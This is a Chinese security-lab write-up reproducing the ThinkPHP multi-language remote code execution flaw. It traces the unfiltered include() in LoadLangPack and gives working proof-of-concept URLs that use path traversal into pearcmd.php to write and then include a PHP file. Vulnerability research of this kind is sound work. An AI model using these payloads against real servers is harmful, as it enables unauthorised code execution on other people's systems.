ThinkPHP多语言rce复现分析
2023-1-6 17:37:12 Author: 雷石安全实验室(查看原文) 阅读量:25 收藏

前段时间爆出的ThinkPHP多语言rce很有意思,最近刚好有时间就学习一下。

利用条件:

1.安装并已知pearcmd.php的文件位置。(默认位置 /usr/local/lib/php/pearcmd.php,Docker版本的镜像中pear默认安装)

2.需要开启php.ini中register_argc_argv选项。(docker的PHP镜像是默认开启的)

3.thinkphp开启多语言功能

影响范围

6.0.1 < ThinkPHP≤ 6.0.13

5.0.0 < ThinkPHP≤ 5.0.12

5.1.0 < ThinkPHP≤ 5.1.8

下载源码:https://github.com/top-think/think

以v6.0.12为例下载解压

修改composer.json中“require”部分

"require": {        "php": ">=7.2.5",        "topthink/framework": "6.0.12",        "topthink/think-orm": "^2.0"},
执行命令:composer install 安装完成
打开多语言功能:app/middleware.php。中取消注释
  •  \think\middleware\LoadLangPack::class,

安装pear:

1、下载  go-pear.phar   http://pear.php.net/go-pear.phar

2、执行 php go-pear.phar 设置1-12选项路径,安装。

或使用docker

docker run --name tp123 -p 8005:80 -d vulfocus/thinkphp:6.0.12

首先看LoadLangPack这个类,handle()函数 中先调用detect()方法在请求中检查是否有参数设置语言

多个判断中检查了get、header、cookie等位置,config['allow_lang_list']默认为空情况下,$langSet赋给$range并返回

又回到handle()中$this->lang->switchLangSet($langset); 执行

参数传入该函数内,拼接:thinkphp路径/lang/ + 用户参数$langset + .php。后传进load()函数

跟进load函数,发现参数传进load函数中,在167行又被传到parse函数内

而parse函数直接用include对$file进行包含,也是漏洞触发点。

从上边流程看出从获取参数到传入parse() 内都未对内容进行过滤。

测试环境:macos 、php7.3、apache2.4

1.首先测试是否存在pearcmd,当返回如下图信息就代表pearcmd存在

http://127.0.0.1/?lang=../../../../../../../../usr/local/lib/php/pearcmd

路径要修改指向你当前环境中 pearcmd.php 的位置。

如图,我当前环境pearcmd安装路径为

“/usr/local/pear/share/pear/pearcmd.php”。

2.先来了解如何利用pear

当开启register_argc_argv时,提交的参数都会传入 $_SERVER[‘argv’]变量内

可见&是无法分割参数的,会被当作一个整体。等号无法赋值,会被直接传进参数

当使用+号分割,将会作为数组,而pear执行是通过 readPHPArgv()来获取argv内容。

对应如下命令:

pear config-create /xxxxxxx1 /tmp/test.php

config-create命令用法,第一个参数为要写入内容,第二参数为要写入路径

3.使用poc测试,在/tmp 目录下写入admin.php文件。

/index.php?+config-create+/&lang=../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo();?>+/tmp/admin.php

注:测试时发现通过get方式提交时  尖括号会被浏览器url编码为 %3C?=phpinfo();?%3E ,并将编码后内容%3c,%3e写入文件,在解析php文件时找不到有效 <?php 标记 ,文件将无法解析。

用burp修改,正确写入后的响应如下:

此时文件已正确写入/tmp目录下,说明

“ /&lang=../../../../../../../../../usr/local/lib/php/pearcmd&/ ”部分被正常解析为get请求。

当成功包含pearcmd文件时,才能利用pear写入文件

也可正常方式写:

http://url/?lang=../../../../../../../../../../usr/local/pear/share/pear/pearcmd&+config-create+/<?=phpinfo()?>+/tmp/hello.php

4.利用文件包含,解析文件

/index.php?lang=../../../../../../../../tmp/admin

再次利用文件包含去访问我们写入的文件。

成功解析文件。

当然不止config-create,还可以用Install命令下载

往期回顾

01
ueditor漏洞利用&源码分析详细版
02
frida inlinehook 巧解Android逆向题

03

无回显的任意文件上传

雷石安全实验室

商务咨询:

0571-87031601

商务邮箱:

[email protected]


文章来源: http://mp.weixin.qq.com/s?__biz=MzI5MDE0MjQ1NQ==&mid=2247517157&idx=1&sn=c7a31b4ecad17d7440f1726fb1aacfda&chksm=ec26a27ddb512b6b8864facb16fb9eb28cc89861c93edb7f5f442e579656774d0e7955eb5fb7#rd
如有侵权请联系:admin#unsafe.sh